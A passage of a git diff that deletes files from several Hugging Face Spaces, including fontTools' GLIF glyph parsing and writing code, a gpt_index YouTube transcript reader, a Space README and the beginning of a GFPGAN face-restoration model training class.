" - "Some data may be skipped or parsed incorrectly.", - msg, - formatVersion, - ) - - if validate and formatVersion not in formatVersions: - raise GlifLibError(f"Forbidden GLIF format version: {formatVersion!s}") - - try: - readGlyphFromTree = _READ_GLYPH_FROM_TREE_FUNCS[formatVersion] - except KeyError: - raise NotImplementedError(formatVersion) - - readGlyphFromTree( - tree=tree, - glyphObject=glyphObject, - pointPen=pointPen, - validate=validate, - formatMinor=formatVersion.minor, - ) - - -def _readGlyphFromTreeFormat1( - tree, glyphObject=None, pointPen=None, validate=None, **kwargs -): - # get the name - _readName(glyphObject, tree, validate) - # populate the sub elements - unicodes = [] - haveSeenAdvance = haveSeenOutline = haveSeenLib = haveSeenNote = False - for element in tree: - if element.tag == "outline": - if validate: - if haveSeenOutline: - raise GlifLibError("The outline element occurs more than once.") - if element.attrib: - raise GlifLibError( - "The outline element contains unknown attributes." - ) - if element.text and element.text.strip() != "": - raise GlifLibError("Invalid outline structure.") - haveSeenOutline = True - buildOutlineFormat1(glyphObject, pointPen, element, validate) - elif glyphObject is None: - continue - elif element.tag == "advance": - if validate and haveSeenAdvance: - raise GlifLibError("The advance element occurs more than once.") - haveSeenAdvance = True - _readAdvance(glyphObject, element) - elif element.tag == "unicode": - try: - v = element.get("hex") - v = int(v, 16) - if v not in unicodes: - unicodes.append(v) - except ValueError: - raise GlifLibError( - "Illegal value for hex attribute of unicode element." - ) - elif element.tag == "note": - if validate and haveSeenNote: - raise GlifLibError("The note element occurs more than once.") - haveSeenNote = True - _readNote(glyphObject, element) - elif element.tag == "lib": - if validate and haveSeenLib: - raise GlifLibError("The lib element occurs more than once.") - haveSeenLib = True - _readLib(glyphObject, element, validate) - else: - raise GlifLibError("Unknown element in GLIF: %s" % element) - # set the collected unicodes - if unicodes: - _relaxedSetattr(glyphObject, "unicodes", unicodes) - - -def _readGlyphFromTreeFormat2( - tree, glyphObject=None, pointPen=None, validate=None, formatMinor=0 -): - # get the name - _readName(glyphObject, tree, validate) - # populate the sub elements - unicodes = [] - guidelines = [] - anchors = [] - haveSeenAdvance = ( - haveSeenImage - ) = haveSeenOutline = haveSeenLib = haveSeenNote = False - identifiers = set() - for element in tree: - if element.tag == "outline": - if validate: - if haveSeenOutline: - raise GlifLibError("The outline element occurs more than once.") - if element.attrib: - raise GlifLibError( - "The outline element contains unknown attributes." - ) - if element.text and element.text.strip() != "": - raise GlifLibError("Invalid outline structure.") - haveSeenOutline = True - if pointPen is not None: - buildOutlineFormat2( - glyphObject, pointPen, element, identifiers, validate - ) - elif glyphObject is None: - continue - elif element.tag == "advance": - if validate and haveSeenAdvance: - raise GlifLibError("The advance element occurs more than once.") - haveSeenAdvance = True - _readAdvance(glyphObject, element) - elif element.tag == "unicode": - try: - v = element.get("hex") - v = int(v, 16) - if v not in unicodes: - unicodes.append(v) - except ValueError: - raise GlifLibError( - "Illegal value for hex attribute of unicode element." 
- ) - elif element.tag == "guideline": - if validate and len(element): - raise GlifLibError("Unknown children in guideline element.") - attrib = dict(element.attrib) - for attr in ("x", "y", "angle"): - if attr in attrib: - attrib[attr] = _number(attrib[attr]) - guidelines.append(attrib) - elif element.tag == "anchor": - if validate and len(element): - raise GlifLibError("Unknown children in anchor element.") - attrib = dict(element.attrib) - for attr in ("x", "y"): - if attr in element.attrib: - attrib[attr] = _number(attrib[attr]) - anchors.append(attrib) - elif element.tag == "image": - if validate: - if haveSeenImage: - raise GlifLibError("The image element occurs more than once.") - if len(element): - raise GlifLibError("Unknown children in image element.") - haveSeenImage = True - _readImage(glyphObject, element, validate) - elif element.tag == "note": - if validate and haveSeenNote: - raise GlifLibError("The note element occurs more than once.") - haveSeenNote = True - _readNote(glyphObject, element) - elif element.tag == "lib": - if validate and haveSeenLib: - raise GlifLibError("The lib element occurs more than once.") - haveSeenLib = True - _readLib(glyphObject, element, validate) - else: - raise GlifLibError("Unknown element in GLIF: %s" % element) - # set the collected unicodes - if unicodes: - _relaxedSetattr(glyphObject, "unicodes", unicodes) - # set the collected guidelines - if guidelines: - if validate and not guidelinesValidator(guidelines, identifiers): - raise GlifLibError("The guidelines are improperly formatted.") - _relaxedSetattr(glyphObject, "guidelines", guidelines) - # set the collected anchors - if anchors: - if validate and not anchorsValidator(anchors, identifiers): - raise GlifLibError("The anchors are improperly formatted.") - _relaxedSetattr(glyphObject, "anchors", anchors) - - -_READ_GLYPH_FROM_TREE_FUNCS = { - GLIFFormatVersion.FORMAT_1_0: _readGlyphFromTreeFormat1, - GLIFFormatVersion.FORMAT_2_0: _readGlyphFromTreeFormat2, -} - - -def _readName(glyphObject, root, validate): - glyphName = root.get("name") - if validate and not glyphName: - raise GlifLibError("Empty glyph name in GLIF.") - if glyphName and glyphObject is not None: - _relaxedSetattr(glyphObject, "name", glyphName) - - -def _readAdvance(glyphObject, advance): - width = _number(advance.get("width", 0)) - _relaxedSetattr(glyphObject, "width", width) - height = _number(advance.get("height", 0)) - _relaxedSetattr(glyphObject, "height", height) - - -def _readNote(glyphObject, note): - lines = note.text.split("\n") - note = "\n".join(line.strip() for line in lines if line.strip()) - _relaxedSetattr(glyphObject, "note", note) - - -def _readLib(glyphObject, lib, validate): - assert len(lib) == 1 - child = lib[0] - plist = plistlib.fromtree(child) - if validate: - valid, message = glyphLibValidator(plist) - if not valid: - raise GlifLibError(message) - _relaxedSetattr(glyphObject, "lib", plist) - - -def _readImage(glyphObject, image, validate): - imageData = dict(image.attrib) - for attr, default in _transformationInfo: - value = imageData.get(attr, default) - imageData[attr] = _number(value) - if validate and not imageValidator(imageData): - raise GlifLibError("The image element is not properly formatted.") - _relaxedSetattr(glyphObject, "image", imageData) - - -# ---------------- -# GLIF to PointPen -# ---------------- - -contourAttributesFormat2 = {"identifier"} -componentAttributesFormat1 = { - "base", - "xScale", - "xyScale", - "yxScale", - "yScale", - "xOffset", - "yOffset", -} 
-componentAttributesFormat2 = componentAttributesFormat1 | {"identifier"} -pointAttributesFormat1 = {"x", "y", "type", "smooth", "name"} -pointAttributesFormat2 = pointAttributesFormat1 | {"identifier"} -pointSmoothOptions = {"no", "yes"} -pointTypeOptions = {"move", "line", "offcurve", "curve", "qcurve"} - -# format 1 - - -def buildOutlineFormat1(glyphObject, pen, outline, validate): - anchors = [] - for element in outline: - if element.tag == "contour": - if len(element) == 1: - point = element[0] - if point.tag == "point": - anchor = _buildAnchorFormat1(point, validate) - if anchor is not None: - anchors.append(anchor) - continue - if pen is not None: - _buildOutlineContourFormat1(pen, element, validate) - elif element.tag == "component": - if pen is not None: - _buildOutlineComponentFormat1(pen, element, validate) - else: - raise GlifLibError("Unknown element in outline element: %s" % element) - if glyphObject is not None and anchors: - if validate and not anchorsValidator(anchors): - raise GlifLibError("GLIF 1 anchors are not properly formatted.") - _relaxedSetattr(glyphObject, "anchors", anchors) - - -def _buildAnchorFormat1(point, validate): - if point.get("type") != "move": - return None - name = point.get("name") - if name is None: - return None - x = point.get("x") - y = point.get("y") - if validate and x is None: - raise GlifLibError("Required x attribute is missing in point element.") - if validate and y is None: - raise GlifLibError("Required y attribute is missing in point element.") - x = _number(x) - y = _number(y) - anchor = dict(x=x, y=y, name=name) - return anchor - - -def _buildOutlineContourFormat1(pen, contour, validate): - if validate and contour.attrib: - raise GlifLibError("Unknown attributes in contour element.") - pen.beginPath() - if len(contour): - massaged = _validateAndMassagePointStructures( - contour, - pointAttributesFormat1, - openContourOffCurveLeniency=True, - validate=validate, - ) - _buildOutlinePointsFormat1(pen, massaged) - pen.endPath() - - -def _buildOutlinePointsFormat1(pen, contour): - for point in contour: - x = point["x"] - y = point["y"] - segmentType = point["segmentType"] - smooth = point["smooth"] - name = point["name"] - pen.addPoint((x, y), segmentType=segmentType, smooth=smooth, name=name) - - -def _buildOutlineComponentFormat1(pen, component, validate): - if validate: - if len(component): - raise GlifLibError("Unknown child elements of component element.") - for attr in component.attrib.keys(): - if attr not in componentAttributesFormat1: - raise GlifLibError("Unknown attribute in component element: %s" % attr) - baseGlyphName = component.get("base") - if validate and baseGlyphName is None: - raise GlifLibError("The base attribute is not defined in the component.") - transformation = [] - for attr, default in _transformationInfo: - value = component.get(attr) - if value is None: - value = default - else: - value = _number(value) - transformation.append(value) - pen.addComponent(baseGlyphName, tuple(transformation)) - - -# format 2 - - -def buildOutlineFormat2(glyphObject, pen, outline, identifiers, validate): - for element in outline: - if element.tag == "contour": - _buildOutlineContourFormat2(pen, element, identifiers, validate) - elif element.tag == "component": - _buildOutlineComponentFormat2(pen, element, identifiers, validate) - else: - raise GlifLibError("Unknown element in outline element: %s" % element.tag) - - -def _buildOutlineContourFormat2(pen, contour, identifiers, validate): - if validate: - for attr in 
contour.attrib.keys(): - if attr not in contourAttributesFormat2: - raise GlifLibError("Unknown attribute in contour element: %s" % attr) - identifier = contour.get("identifier") - if identifier is not None: - if validate: - if identifier in identifiers: - raise GlifLibError( - "The identifier %s is used more than once." % identifier - ) - if not identifierValidator(identifier): - raise GlifLibError( - "The contour identifier %s is not valid." % identifier - ) - identifiers.add(identifier) - try: - pen.beginPath(identifier=identifier) - except TypeError: - pen.beginPath() - warn( - "The beginPath method needs an identifier kwarg. The contour's identifier value has been discarded.", - DeprecationWarning, - ) - if len(contour): - massaged = _validateAndMassagePointStructures( - contour, pointAttributesFormat2, validate=validate - ) - _buildOutlinePointsFormat2(pen, massaged, identifiers, validate) - pen.endPath() - - -def _buildOutlinePointsFormat2(pen, contour, identifiers, validate): - for point in contour: - x = point["x"] - y = point["y"] - segmentType = point["segmentType"] - smooth = point["smooth"] - name = point["name"] - identifier = point.get("identifier") - if identifier is not None: - if validate: - if identifier in identifiers: - raise GlifLibError( - "The identifier %s is used more than once." % identifier - ) - if not identifierValidator(identifier): - raise GlifLibError("The identifier %s is not valid." % identifier) - identifiers.add(identifier) - try: - pen.addPoint( - (x, y), - segmentType=segmentType, - smooth=smooth, - name=name, - identifier=identifier, - ) - except TypeError: - pen.addPoint((x, y), segmentType=segmentType, smooth=smooth, name=name) - warn( - "The addPoint method needs an identifier kwarg. The point's identifier value has been discarded.", - DeprecationWarning, - ) - - -def _buildOutlineComponentFormat2(pen, component, identifiers, validate): - if validate: - if len(component): - raise GlifLibError("Unknown child elements of component element.") - for attr in component.attrib.keys(): - if attr not in componentAttributesFormat2: - raise GlifLibError("Unknown attribute in component element: %s" % attr) - baseGlyphName = component.get("base") - if validate and baseGlyphName is None: - raise GlifLibError("The base attribute is not defined in the component.") - transformation = [] - for attr, default in _transformationInfo: - value = component.get(attr) - if value is None: - value = default - else: - value = _number(value) - transformation.append(value) - identifier = component.get("identifier") - if identifier is not None: - if validate: - if identifier in identifiers: - raise GlifLibError( - "The identifier %s is used more than once." % identifier - ) - if validate and not identifierValidator(identifier): - raise GlifLibError("The identifier %s is not valid." % identifier) - identifiers.add(identifier) - try: - pen.addComponent(baseGlyphName, tuple(transformation), identifier=identifier) - except TypeError: - pen.addComponent(baseGlyphName, tuple(transformation)) - warn( - "The addComponent method needs an identifier kwarg. 
The component's identifier value has been discarded.", - DeprecationWarning, - ) - - -# all formats - - -def _validateAndMassagePointStructures( - contour, pointAttributes, openContourOffCurveLeniency=False, validate=True -): - if not len(contour): - return - # store some data for later validation - lastOnCurvePoint = None - haveOffCurvePoint = False - # validate and massage the individual point elements - massaged = [] - for index, element in enumerate(contour): - # not - if element.tag != "point": - raise GlifLibError( - "Unknown child element (%s) of contour element." % element.tag - ) - point = dict(element.attrib) - massaged.append(point) - if validate: - # unknown attributes - for attr in point.keys(): - if attr not in pointAttributes: - raise GlifLibError("Unknown attribute in point element: %s" % attr) - # search for unknown children - if len(element): - raise GlifLibError("Unknown child elements in point element.") - # x and y are required - for attr in ("x", "y"): - try: - point[attr] = _number(point[attr]) - except KeyError as e: - raise GlifLibError( - f"Required {attr} attribute is missing in point element." - ) from e - # segment type - pointType = point.pop("type", "offcurve") - if validate and pointType not in pointTypeOptions: - raise GlifLibError("Unknown point type: %s" % pointType) - if pointType == "offcurve": - pointType = None - point["segmentType"] = pointType - if pointType is None: - haveOffCurvePoint = True - else: - lastOnCurvePoint = index - # move can only occur as the first point - if validate and pointType == "move" and index != 0: - raise GlifLibError( - "A move point occurs after the first point in the contour." - ) - # smooth is optional - smooth = point.get("smooth", "no") - if validate and smooth is not None: - if smooth not in pointSmoothOptions: - raise GlifLibError("Unknown point smooth value: %s" % smooth) - smooth = smooth == "yes" - point["smooth"] = smooth - # smooth can only be applied to curve and qcurve - if validate and smooth and pointType is None: - raise GlifLibError("smooth attribute set in an offcurve point.") - # name is optional - if "name" not in element.attrib: - point["name"] = None - if openContourOffCurveLeniency: - # remove offcurves that precede a move. this is technically illegal, - # but we let it slide because there are fonts out there in the wild like this. - if massaged[0]["segmentType"] == "move": - count = 0 - for point in reversed(massaged): - if point["segmentType"] is None: - count += 1 - else: - break - if count: - massaged = massaged[:-count] - # validate the off-curves in the segments - if validate and haveOffCurvePoint and lastOnCurvePoint is not None: - # we only care about how many offCurves there are before an onCurve - # filter out the trailing offCurves - offCurvesCount = len(massaged) - 1 - lastOnCurvePoint - for point in massaged: - segmentType = point["segmentType"] - if segmentType is None: - offCurvesCount += 1 - else: - if offCurvesCount: - # move and line can't be preceded by off-curves - if segmentType == "move": - # this will have been filtered out already - raise GlifLibError("move can not have an offcurve.") - elif segmentType == "line": - raise GlifLibError("line can not have an offcurve.") - elif segmentType == "curve": - if offCurvesCount > 2: - raise GlifLibError("Too many offcurves defined for curve.") - elif segmentType == "qcurve": - pass - else: - # unknown segment type. it'll be caught later. 
- pass - offCurvesCount = 0 - return massaged - - -# --------------------- -# Misc Helper Functions -# --------------------- - - -def _relaxedSetattr(object, attr, value): - try: - setattr(object, attr, value) - except AttributeError: - pass - - -def _number(s): - """ - Given a numeric string, return an integer or a float, whichever - the string indicates. _number("1") will return the integer 1, - _number("1.0") will return the float 1.0. - - >>> _number("1") - 1 - >>> _number("1.0") - 1.0 - >>> _number("a") # doctest: +IGNORE_EXCEPTION_DETAIL - Traceback (most recent call last): - ... - GlifLibError: Could not convert a to an int or float. - """ - try: - n = int(s) - return n - except ValueError: - pass - try: - n = float(s) - return n - except ValueError: - raise GlifLibError("Could not convert %s to an int or float." % s) - - -# -------------------- -# Rapid Value Fetching -# -------------------- - -# base - - -class _DoneParsing(Exception): - pass - - -class _BaseParser: - def __init__(self): - self._elementStack = [] - - def parse(self, text): - from xml.parsers.expat import ParserCreate - - parser = ParserCreate() - parser.StartElementHandler = self.startElementHandler - parser.EndElementHandler = self.endElementHandler - parser.Parse(text) - - def startElementHandler(self, name, attrs): - self._elementStack.append(name) - - def endElementHandler(self, name): - other = self._elementStack.pop(-1) - assert other == name - - -# unicodes - - -def _fetchUnicodes(glif): - """ - Get a list of unicodes listed in glif. - """ - parser = _FetchUnicodesParser() - parser.parse(glif) - return parser.unicodes - - -class _FetchUnicodesParser(_BaseParser): - def __init__(self): - self.unicodes = [] - super().__init__() - - def startElementHandler(self, name, attrs): - if ( - name == "unicode" - and self._elementStack - and self._elementStack[-1] == "glyph" - ): - value = attrs.get("hex") - if value is not None: - try: - value = int(value, 16) - if value not in self.unicodes: - self.unicodes.append(value) - except ValueError: - pass - super().startElementHandler(name, attrs) - - -# image - - -def _fetchImageFileName(glif): - """ - The image file name (if any) from glif. - """ - parser = _FetchImageFileNameParser() - try: - parser.parse(glif) - except _DoneParsing: - pass - return parser.fileName - - -class _FetchImageFileNameParser(_BaseParser): - def __init__(self): - self.fileName = None - super().__init__() - - def startElementHandler(self, name, attrs): - if name == "image" and self._elementStack and self._elementStack[-1] == "glyph": - self.fileName = attrs.get("fileName") - raise _DoneParsing - super().startElementHandler(name, attrs) - - -# component references - - -def _fetchComponentBases(glif): - """ - Get a list of component base glyphs listed in glif. 
- """ - parser = _FetchComponentBasesParser() - try: - parser.parse(glif) - except _DoneParsing: - pass - return list(parser.bases) - - -class _FetchComponentBasesParser(_BaseParser): - def __init__(self): - self.bases = [] - super().__init__() - - def startElementHandler(self, name, attrs): - if ( - name == "component" - and self._elementStack - and self._elementStack[-1] == "outline" - ): - base = attrs.get("base") - if base is not None: - self.bases.append(base) - super().startElementHandler(name, attrs) - - def endElementHandler(self, name): - if name == "outline": - raise _DoneParsing - super().endElementHandler(name) - - -# -------------- -# GLIF Point Pen -# -------------- - -_transformationInfo = [ - # field name, default value - ("xScale", 1), - ("xyScale", 0), - ("yxScale", 0), - ("yScale", 1), - ("xOffset", 0), - ("yOffset", 0), -] - - -class GLIFPointPen(AbstractPointPen): - - """ - Helper class using the PointPen protocol to write the - part of .glif files. - """ - - def __init__(self, element, formatVersion=None, identifiers=None, validate=True): - if identifiers is None: - identifiers = set() - self.formatVersion = GLIFFormatVersion(formatVersion) - self.identifiers = identifiers - self.outline = element - self.contour = None - self.prevOffCurveCount = 0 - self.prevPointTypes = [] - self.validate = validate - - def beginPath(self, identifier=None, **kwargs): - attrs = OrderedDict() - if identifier is not None and self.formatVersion.major >= 2: - if self.validate: - if identifier in self.identifiers: - raise GlifLibError( - "identifier used more than once: %s" % identifier - ) - if not identifierValidator(identifier): - raise GlifLibError( - "identifier not formatted properly: %s" % identifier - ) - attrs["identifier"] = identifier - self.identifiers.add(identifier) - self.contour = etree.SubElement(self.outline, "contour", attrs) - self.prevOffCurveCount = 0 - - def endPath(self): - if self.prevPointTypes and self.prevPointTypes[0] == "move": - if self.validate and self.prevPointTypes[-1] == "offcurve": - raise GlifLibError("open contour has loose offcurve point") - # prevent lxml from writing self-closing tags - if not len(self.contour): - self.contour.text = "\n " - self.contour = None - self.prevPointType = None - self.prevOffCurveCount = 0 - self.prevPointTypes = [] - - def addPoint( - self, pt, segmentType=None, smooth=None, name=None, identifier=None, **kwargs - ): - attrs = OrderedDict() - # coordinates - if pt is not None: - if self.validate: - for coord in pt: - if not isinstance(coord, numberTypes): - raise GlifLibError("coordinates must be int or float") - attrs["x"] = repr(pt[0]) - attrs["y"] = repr(pt[1]) - # segment type - if segmentType == "offcurve": - segmentType = None - if self.validate: - if segmentType == "move" and self.prevPointTypes: - raise GlifLibError( - "move occurs after a point has already been added to the contour." - ) - if ( - segmentType in ("move", "line") - and self.prevPointTypes - and self.prevPointTypes[-1] == "offcurve" - ): - raise GlifLibError("offcurve occurs before %s point." 
% segmentType) - if segmentType == "curve" and self.prevOffCurveCount > 2: - raise GlifLibError("too many offcurve points before curve point.") - if segmentType is not None: - attrs["type"] = segmentType - else: - segmentType = "offcurve" - if segmentType == "offcurve": - self.prevOffCurveCount += 1 - else: - self.prevOffCurveCount = 0 - self.prevPointTypes.append(segmentType) - # smooth - if smooth: - if self.validate and segmentType == "offcurve": - raise GlifLibError("can't set smooth in an offcurve point.") - attrs["smooth"] = "yes" - # name - if name is not None: - attrs["name"] = name - # identifier - if identifier is not None and self.formatVersion.major >= 2: - if self.validate: - if identifier in self.identifiers: - raise GlifLibError( - "identifier used more than once: %s" % identifier - ) - if not identifierValidator(identifier): - raise GlifLibError( - "identifier not formatted properly: %s" % identifier - ) - attrs["identifier"] = identifier - self.identifiers.add(identifier) - etree.SubElement(self.contour, "point", attrs) - - def addComponent(self, glyphName, transformation, identifier=None, **kwargs): - attrs = OrderedDict([("base", glyphName)]) - for (attr, default), value in zip(_transformationInfo, transformation): - if self.validate and not isinstance(value, numberTypes): - raise GlifLibError("transformation values must be int or float") - if value != default: - attrs[attr] = repr(value) - if identifier is not None and self.formatVersion.major >= 2: - if self.validate: - if identifier in self.identifiers: - raise GlifLibError( - "identifier used more than once: %s" % identifier - ) - if self.validate and not identifierValidator(identifier): - raise GlifLibError( - "identifier not formatted properly: %s" % identifier - ) - attrs["identifier"] = identifier - self.identifiers.add(identifier) - etree.SubElement(self.outline, "component", attrs) - - -if __name__ == "__main__": - import doctest - - doctest.testmod() diff --git a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/gpt_index/readers/youtube_transcript.py b/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/gpt_index/readers/youtube_transcript.py deleted file mode 100644 index a67e9f96fb57ac6075eb5fa36bb7cf0ae2323c51..0000000000000000000000000000000000000000 --- a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/gpt_index/readers/youtube_transcript.py +++ /dev/null @@ -1,38 +0,0 @@ -"""Simple Reader that reads transcript of youtube video.""" -from typing import Any, List - -from gpt_index.readers.base import BaseReader -from gpt_index.readers.schema.base import Document - - -class YoutubeTranscriptReader(BaseReader): - """Youtube Transcript reader.""" - - def __init__(self) -> None: - """Initialize with parameters.""" - - def load_data(self, ytlinks: List[str], **load_kwargs: Any) -> List[Document]: - """Load data from the input directory. - - Args: - pages (List[str]): List of youtube links \ - for which transcripts are to be read. 
- - """ - try: - from youtube_transcript_api import YouTubeTranscriptApi - except ImportError: - raise ImportError( - "`youtube_transcript_api` package not found, \ - please run `pip install youtube-transcript-api`" - ) - - results = [] - for link in ytlinks: - video_id = link.split("?v=")[-1] - srt = YouTubeTranscriptApi.get_transcript(video_id) - transcript = "" - for chunk in srt: - transcript = transcript + chunk["text"] + "\n" - results.append(Document(transcript)) - return results diff --git a/spaces/joey1895/tsspace01/README.md b/spaces/joey1895/tsspace01/README.md deleted file mode 100644 index b12be5464572fbb7e5703b42383c06738593ce7c..0000000000000000000000000000000000000000 --- a/spaces/joey1895/tsspace01/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Hotdog Gradio -emoji: 🦀 -colorFrom: purple -colorTo: purple -sdk: gradio -sdk_version: 3.1.7 -app_file: app.py -pinned: false -license: apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces#reference \ No newline at end of file diff --git a/spaces/jone/GFPGAN/gfpgan/models/gfpgan_model.py b/spaces/jone/GFPGAN/gfpgan/models/gfpgan_model.py deleted file mode 100644 index 00f3e3ad04f61189508ead2f0ba5561941fd4fe3..0000000000000000000000000000000000000000 --- a/spaces/jone/GFPGAN/gfpgan/models/gfpgan_model.py +++ /dev/null @@ -1,580 +0,0 @@ -import math -import os.path as osp -import torch -from basicsr.archs import build_network -from basicsr.losses import build_loss -from basicsr.losses.gan_loss import r1_penalty -from basicsr.metrics import calculate_metric -from basicsr.models.base_model import BaseModel -from basicsr.utils import get_root_logger, imwrite, tensor2img -from basicsr.utils.registry import MODEL_REGISTRY -from collections import OrderedDict -from torch.nn import functional as F -from torchvision.ops import roi_align -from tqdm import tqdm - - -@MODEL_REGISTRY.register() -class GFPGANModel(BaseModel): - """The GFPGAN model for Towards real-world blind face restoratin with generative facial prior""" - - def __init__(self, opt): - super(GFPGANModel, self).__init__(opt) - self.idx = 0 # it is used for saving data for check - - # define network - self.net_g = build_network(opt['network_g']) - self.net_g = self.model_to_device(self.net_g) - self.print_network(self.net_g) - - # load pretrained model - load_path = self.opt['path'].get('pretrain_network_g', None) - if load_path is not None: - param_key = self.opt['path'].get('param_key_g', 'params') - self.load_network(self.net_g, load_path, self.opt['path'].get('strict_load_g', True), param_key) - - self.log_size = int(math.log(self.opt['network_g']['out_size'], 2)) - - if self.is_train: - self.init_training_settings() - - def init_training_settings(self): - train_opt = self.opt['train'] - - # ----------- define net_d ----------- # - self.net_d = build_network(self.opt['network_d']) - self.net_d = self.model_to_device(self.net_d) - self.print_network(self.net_d) - # load pretrained model - load_path = self.opt['path'].get('pretrain_network_d', None) - if load_path is not None: - self.load_network(self.net_d, load_path, self.opt['path'].get('strict_load_d', True)) - - # ----------- define net_g with Exponential Moving Average (EMA) ----------- # - # net_g_ema only used for testing on one GPU and saving. 
There is no need to wrap with DistributedDataParallel - self.net_g_ema = build_network(self.opt['network_g']).to(self.device) - # load pretrained model - load_path = self.opt['path'].get('pretrain_network_g', None) - if load_path is not None: - self.load_network(self.net_g_ema, load_path, self.opt['path'].get('strict_load_g', True), 'params_ema') - else: - self.model_ema(0) # copy net_g weight - - self.net_g.train() - self.net_d.train() - self.net_g_ema.eval() - - # ----------- facial component networks ----------- # - if ('network_d_left_eye' in self.opt and 'network_d_right_eye' in self.opt and 'network_d_mouth' in self.opt): - self.use_facial_disc = True - else: - self.use_facial_disc = False - - if self.use_facial_disc: - # left eye - self.net_d_left_eye = build_network(self.opt['network_d_left_eye']) - self.net_d_left_eye = self.model_to_device(self.net_d_left_eye) - self.print_network(self.net_d_left_eye) - load_path = self.opt['path'].get('pretrain_network_d_left_eye') - if load_path is not None: - self.load_network(self.net_d_left_eye, load_path, True, 'params') - # right eye - self.net_d_right_eye = build_network(self.opt['network_d_right_eye']) - self.net_d_right_eye = self.model_to_device(self.net_d_right_eye) - self.print_network(self.net_d_right_eye) - load_path = self.opt['path'].get('pretrain_network_d_right_eye') - if load_path is not None: - self.load_network(self.net_d_right_eye, load_path, True, 'params') - # mouth - self.net_d_mouth = build_network(self.opt['network_d_mouth']) - self.net_d_mouth = self.model_to_device(self.net_d_mouth) - self.print_network(self.net_d_mouth) - load_path = self.opt['path'].get('pretrain_network_d_mouth') - if load_path is not None: - self.load_network(self.net_d_mouth, load_path, True, 'params') - - self.net_d_left_eye.train() - self.net_d_right_eye.train() - self.net_d_mouth.train() - - # ----------- define facial component gan loss ----------- # - self.cri_component = build_loss(train_opt['gan_component_opt']).to(self.device) - - # ----------- define losses ----------- # - # pixel loss - if train_opt.get('pixel_opt'): - self.cri_pix = build_loss(train_opt['pixel_opt']).to(self.device) - else: - self.cri_pix = None - - # perceptual loss - if train_opt.get('perceptual_opt'): - self.cri_perceptual = build_loss(train_opt['perceptual_opt']).to(self.device) - else: - self.cri_perceptual = None - - # L1 loss is used in pyramid loss, component style loss and identity loss - self.cri_l1 = build_loss(train_opt['L1_opt']).to(self.device) - - # gan loss (wgan) - self.cri_gan = build_loss(train_opt['gan_opt']).to(self.device) - - # ----------- define identity loss ----------- # - if 'network_identity' in self.opt: - self.use_identity = True - else: - self.use_identity = False - - if self.use_identity: - # define identity network - self.network_identity = build_network(self.opt['network_identity']) - self.network_identity = self.model_to_device(self.network_identity) - self.print_network(self.network_identity) - load_path = self.opt['path'].get('pretrain_network_identity') - if load_path is not None: - self.load_network(self.network_identity, load_path, True, None) - self.network_identity.eval() - for param in self.network_identity.parameters(): - param.requires_grad = False - - # regularization weights - self.r1_reg_weight = train_opt['r1_reg_weight'] # for discriminator - self.net_d_iters = train_opt.get('net_d_iters', 1) - self.net_d_init_iters = train_opt.get('net_d_init_iters', 0) - self.net_d_reg_every = train_opt['net_d_reg_every'] - - # set 
up optimizers and schedulers - self.setup_optimizers() - self.setup_schedulers() - - def setup_optimizers(self): - train_opt = self.opt['train'] - - # ----------- optimizer g ----------- # - net_g_reg_ratio = 1 - normal_params = [] - for _, param in self.net_g.named_parameters(): - normal_params.append(param) - optim_params_g = [{ # add normal params first - 'params': normal_params, - 'lr': train_opt['optim_g']['lr'] - }] - optim_type = train_opt['optim_g'].pop('type') - lr = train_opt['optim_g']['lr'] * net_g_reg_ratio - betas = (0**net_g_reg_ratio, 0.99**net_g_reg_ratio) - self.optimizer_g = self.get_optimizer(optim_type, optim_params_g, lr, betas=betas) - self.optimizers.append(self.optimizer_g) - - # ----------- optimizer d ----------- # - net_d_reg_ratio = self.net_d_reg_every / (self.net_d_reg_every + 1) - normal_params = [] - for _, param in self.net_d.named_parameters(): - normal_params.append(param) - optim_params_d = [{ # add normal params first - 'params': normal_params, - 'lr': train_opt['optim_d']['lr'] - }] - optim_type = train_opt['optim_d'].pop('type') - lr = train_opt['optim_d']['lr'] * net_d_reg_ratio - betas = (0**net_d_reg_ratio, 0.99**net_d_reg_ratio) - self.optimizer_d = self.get_optimizer(optim_type, optim_params_d, lr, betas=betas) - self.optimizers.append(self.optimizer_d) - - # ----------- optimizers for facial component networks ----------- # - if self.use_facial_disc: - # setup optimizers for facial component discriminators - optim_type = train_opt['optim_component'].pop('type') - lr = train_opt['optim_component']['lr'] - # left eye - self.optimizer_d_left_eye = self.get_optimizer( - optim_type, self.net_d_left_eye.parameters(), lr, betas=(0.9, 0.99)) - self.optimizers.append(self.optimizer_d_left_eye) - # right eye - self.optimizer_d_right_eye = self.get_optimizer( - optim_type, self.net_d_right_eye.parameters(), lr, betas=(0.9, 0.99)) - self.optimizers.append(self.optimizer_d_right_eye) - # mouth - self.optimizer_d_mouth = self.get_optimizer( - optim_type, self.net_d_mouth.parameters(), lr, betas=(0.9, 0.99)) - self.optimizers.append(self.optimizer_d_mouth) - - def feed_data(self, data): - self.lq = data['lq'].to(self.device) - if 'gt' in data: - self.gt = data['gt'].to(self.device) - - if 'loc_left_eye' in data: - # get facial component locations, shape (batch, 4) - self.loc_left_eyes = data['loc_left_eye'] - self.loc_right_eyes = data['loc_right_eye'] - self.loc_mouths = data['loc_mouth'] - - # uncomment to check data - # import torchvision - # if self.opt['rank'] == 0: - # import os - # os.makedirs('tmp/gt', exist_ok=True) - # os.makedirs('tmp/lq', exist_ok=True) - # print(self.idx) - # torchvision.utils.save_image( - # self.gt, f'tmp/gt/gt_{self.idx}.png', nrow=4, padding=2, normalize=True, range=(-1, 1)) - # torchvision.utils.save_image( - # self.lq, f'tmp/lq/lq{self.idx}.png', nrow=4, padding=2, normalize=True, range=(-1, 1)) - # self.idx = self.idx + 1 - - def construct_img_pyramid(self): - """Construct image pyramid for intermediate restoration loss""" - pyramid_gt = [self.gt] - down_img = self.gt - for _ in range(0, self.log_size - 3): - down_img = F.interpolate(down_img, scale_factor=0.5, mode='bilinear', align_corners=False) - pyramid_gt.insert(0, down_img) - return pyramid_gt - - def get_roi_regions(self, eye_out_size=80, mouth_out_size=120): - face_ratio = int(self.opt['network_g']['out_size'] / 512) - eye_out_size *= face_ratio - mouth_out_size *= face_ratio - - rois_eyes = [] - rois_mouths = [] - for b in range(self.loc_left_eyes.size(0)): # 
